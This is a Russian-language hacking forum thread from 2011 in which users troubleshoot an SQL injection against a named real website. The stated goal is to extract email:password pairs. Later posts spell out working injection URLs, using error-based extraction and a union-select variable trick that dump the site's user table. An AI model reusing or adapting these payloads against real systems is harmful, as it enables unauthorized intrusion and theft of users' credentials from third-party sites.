HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18951  
Старый 21.12.2011, 14:37
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

точно не знаю, но по моему это проблемы из-за кодировки, попробуй изменить кодировку страницы.
 
Ответить с цитированием

  #18952  
Старый 21.12.2011, 14:40
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от wkar  
wkar said:
точно не знаю, но по моему это проблемы из-за кодировки, попробуй изменить кодировку страницы.
как?
 
Ответить с цитированием

  #18953  
Старый 21.12.2011, 14:44
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

В мозиле: Вид - Кодировка и попробуй каждую
 
Ответить с цитированием

  #18954  
Старый 21.12.2011, 15:02
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от wkar  
wkar said:
В мозиле: Вид - Кодировка и попробуй каждую
а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются

тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс

но я столкнулся с такой проблемой,

при такой конструкции concat_ws(0x3a,email,password)

выводит ошибку

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]Illegal mix of collations[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]binary[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]COERCIBLE[/COLOR][COLOR="#007700"]), ([/COLOR][COLOR="#0000BB"]latin1_swedish_ci[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]IMPLICIT[/COLOR][COLOR="#007700"]), ([/COLOR][COLOR="#0000BB"]cp1251_general_ci[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]IMPLICIT[/COLOR][COLOR="#007700"]) for[/COLOR][COLOR="#0000BB"]operation[/COLOR][COLOR="#DD0000"]'concat_ws'

[/COLOR][/COLOR
как можно ещо попробовать вывести в нужном для меня виде?
 
Ответить с цитированием

  #18955  
Старый 21.12.2011, 15:05
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются
тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс
но я столкнулся с такой проблемой,
при такой конструкции concat_ws(0x3a,email,password)
выводит ошибку
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]Illegal mix of collations[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]binary[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]COERCIBLE[/COLOR][COLOR="#007700"]), ([/COLOR][COLOR="#0000BB"]latin1_swedish_ci[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]IMPLICIT[/COLOR][COLOR="#007700"]), ([/COLOR][COLOR="#0000BB"]cp1251_general_ci[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]IMPLICIT[/COLOR][COLOR="#007700"]) for[/COLOR][COLOR="#0000BB"]operation[/COLOR][COLOR="#DD0000"]'concat_ws'

[/COLOR][/COLOR
как можно ещо попробовать вывести в нужном для меня виде?
unhex(hex(concat_ws(0x3a,email,password)))
 
Ответить с цитированием

  #18956  
Старый 21.12.2011, 15:10
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
unhex(hex(concat_ws(0x3a,email,password)))
непомогло
 
Ответить с цитированием

  #18957  
Старый 21.12.2011, 15:19
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
непомогло
Нужен линк, так сложно определить в чем проблема
 
Ответить с цитированием

  #18958  
Старый 21.12.2011, 15:21
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
Нужен линк, так сложно определить в чем проблема
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhex(hex(concat_ws(0x3a,email,password)))+from+user+limit+1,1),floor(rand(0)*2))having+min(0)+or+1--+

[/COLOR][/COLOR
 
Ответить с цитированием

  #18959  
Старый 21.12.2011, 15:28
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+unhex(hex(concat_ws(0x3a,email,password)))+from+user+limit+1,1),floor(rand(0)*2))having+min(0)+or+1--+

[/COLOR][/COLOR
Выводи пока так

Цитата:
Сообщение от None  
http://motoprotect.com.ua/index.php?id=12'+or+1+group+by+concat((select+pass word+from+user+limit+10,1),floor(rand(0)*2))having +min(0)+or+1--+
и так еще можно:

Цитата:
Сообщение от None  
http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+
 
Ответить с цитированием

  #18960  
Старый 21.12.2011, 15:45
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
Выводи пока так
и так еще можно:
о, спасибо, а чё ето за чудо конструкция??

http://motoprotect.com.ua/index.php?id=-12'+union+select+1,2,(select(@x)from(select(@x:=0x 00),(select(0)from(user)where(0x00)in(@x:=concat(@ x,0x3c62723e,email,0x3a,password))))x),4+--+

где я могу почитать о том что ето (@x:=0x 00) и тп, означает?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ